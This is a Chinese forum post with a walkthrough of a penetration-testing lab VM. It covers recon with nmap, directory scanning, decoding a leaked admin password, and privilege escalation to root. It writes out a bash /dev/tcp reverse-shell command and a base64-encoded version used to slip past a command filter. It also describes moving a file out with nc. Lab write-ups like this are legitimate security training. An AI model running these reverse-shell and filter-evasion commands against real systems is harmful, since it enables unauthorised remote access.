电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 566 人浏览分享

内核提权

[复制链接]
566 0
注:严禁恶意攻击及非法利用,由此所产生的一切后果均由读者自行承担!!!

1.信息收集

1)vmware虚拟靶场

QQ截图20220803093911.png

2)arp探测一下ip地址:

QQ截图20220803094013.png

3)使用工具nmap扫描获取系统版本或开放的端口:

QQ截图20220803100440.png

4)看到开放80和443端口时http服务,访问一下:

QQ截图20220803100607.png

6666.png

5)bad request 400,请求参数错误,nmap扫描的时候,发现有两个DNS,添加到host文件中:

919.png

6)绑定域名后,就可以访问了:

918.png

916.png

2.目录探测

1)扫一下目录:

912.png

2)发现登陆页面:

911.png

3)再扫一下443:

910.png

4)访问一下index.html和robots.txt发现有测试注释:

909.png

908.png

3.信息利用

1)发现管理员账号,密码使用了testdata.txt加密算法:

907.png

2)输入tsetdata.txt发现一篇文章:

906.png

3)回到前面80端口访问到一些16进制字符,结合以上得到的信息加密传输遗留,大概是密钥:

905.png

4)对以上密钥进行转码,每段就会有一个重复:

904.png

4.内网渗透

1)尝试SSH连接,权限拒绝:

903.png

2)以上扫描还有一个登录页面,尝试一下,登录成功,提示命令可执行:

902.png

3)可执行CLI命令那就好办了,输入反弹shell命令,禁止远程连接:

指令:bash -i >& /dev/tcp/kali地址/侦听端口号 0>&1

901.png

4)尝试base64编码绕过:

900.png

5)转码后输入,再次提交,最多能输入100个字符,连接成功:
指令:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzI1MDAxIDA+JjE=}|
{base64,-d}|{bash,-i}'           //管道应字符超出空格删掉了

899.png

898.png

6)发现是个普通用户,查看是否存在python环境,切换交互式shell:

897.png

5.提权

1)查询具有uid标识的文件发现pkexec提权漏洞:

896.png

2)github搜索pkexec下载脚本到kali,开启http服务访问下载,没有权限:

37.png

3)以上查询uid标识的文件/usr/bi/reset_root查看一下,一堆乱码:

36.png

4)输入文件路径执行,提示触发失败:

33.png

5)使用nc将文件传出到kali:

32.png

6)然后kali这边用strace解析一下,缺少这三个文件执行不了:

31.png

7)在目标机上创建这三个文件在执行,成功拿到root密码(Earth),su切换到root,提权成功:

30.png

26.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.